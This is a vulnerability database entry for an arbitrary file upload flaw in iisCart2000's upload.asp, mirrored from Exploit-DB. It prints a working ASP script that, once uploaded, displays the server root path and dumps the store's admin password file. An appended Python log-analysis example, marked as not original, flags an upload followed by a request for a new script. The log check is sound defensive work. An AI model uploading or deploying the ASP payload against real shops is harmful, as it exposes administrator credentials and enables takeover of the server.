iisCart2000 – Arbitrary File Upload

Vulnerability ID: 1053915
Vulnerability type:
Published: 2003-05-31
Updated: 2003-05-31
CVE ID: N/A
CNNVD-ID: N/A
Platform: ASP
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/22697
|Details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/7765/info

A vulnerability has been reported for iisCart2000 that may allow an attacker to upload arbitrary files to a vulnerable server. The vulnerability exists in the upload.asp script. Successful exploitation may result in the execution of attacker-supplied code.

// 1ndonesian Security Team
// http://bosen.net/releases/
//
<% @ Language = JScript %>
<%
function WinPath(absPath) {this.absolutePath = absPath;}
function getAbsPath() {return this.absolutePath;}
WinPath.prototype.getAbsolutePath = getAbsPath;

function fileRead(file) {
  var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = ""
  var tmp = file, f, g = FSO.GetFile(tmp);
  f = FSO.OpenTextFile(tmp, 1, false);
  strOut = "<PRE STYLE=\"font-size:9pt;\">";
  strOut+= Server.HTMLEncode(f.ReadAll());
  strOut+= "</PRE>";
  f.Close();
  return(strOut);
}

var a = new WinPath(Server.Mappath("/"));
var curDir   = a.getAbsolutePath();

// You can change these
var admin = curDir + "\\advanced\\admin\\pswd.asp";

with (Response) {
  Write("<b>ServerRoot : "+curDir+"<br></b>");
  Write("<b>Admin Info : "+admin+"<br><br></b>");
  Write(fileRead(admin));
}
%>
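
A log check for the upload-then-execute pattern the advisory describes, added here as an example that is not part of the original advisory or exploit: it reads IIS W3C extended logs and flags a client that POSTs to upload.asp and then requests a script file nobody had requested before. The /shop/ paths, the 30-minute window, the extension list and the sample log are constructed assumptions.

```python
from datetime import datetime, timedelta

# Extensions commonly mapped to the ASP engine on IIS (assumption: adjust to your script maps).
SCRIPT_EXT = (".asp", ".asa", ".cer", ".cdx")
WINDOW = timedelta(minutes=30)  # assumption: how long after an upload a first request is suspicious

# Constructed sample log, not real traffic; every path except the name upload.asp is hypothetical.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2003-05-31 10:00:01 192.0.2.10 GET /shop/default.asp 200
2003-05-31 10:00:09 192.0.2.10 GET /shop/upload.asp 200
2003-05-31 10:02:13 198.51.100.7 GET /shop/upload.asp 200
2003-05-31 10:02:40 198.51.100.7 POST /shop/upload.asp 200
2003-05-31 10:02:58 198.51.100.7 GET /shop/uploads/r.asp 200
2003-05-31 10:03:30 192.0.2.10 POST /shop/upload.asp 200
2003-05-31 10:03:41 192.0.2.10 GET /shop/uploads/photo.jpg 200
2003-05-31 10:04:02 192.0.2.10 GET /shop/default.asp 200
"""

def parse_w3c(text):
    """Yield one dict per request line, named by the log's own #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            yield row

def find_upload_then_execute(text):
    """Return (client, path) for script paths first seen shortly after that client's upload."""
    seen, last_upload, findings = set(), {}, []
    for r in parse_w3c(text):
        stem, ip = r["cs-uri-stem"].lower(), r["c-ip"]
        ok = r["sc-status"].startswith("2")
        if r["cs-method"] == "POST" and stem.endswith("/upload.asp") and ok:
            last_upload[ip] = r["ts"]  # remember when this client last uploaded
        elif stem.endswith(SCRIPT_EXT) and stem not in seen and ok:
            t = last_upload.get(ip)
            if t is not None and r["ts"] - t <= WINDOW:
                findings.append((ip, stem))  # new script served right after an upload
        seen.add(stem)
    return findings

if __name__ == "__main__":
    for ip, path in find_upload_then_execute(SAMPLE_LOG):
        print(f"review: {ip} uploaded, then requested new script {path}")
```

Image uploads followed by a request for the image do not match, because only script-mapped extensions count as findings.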
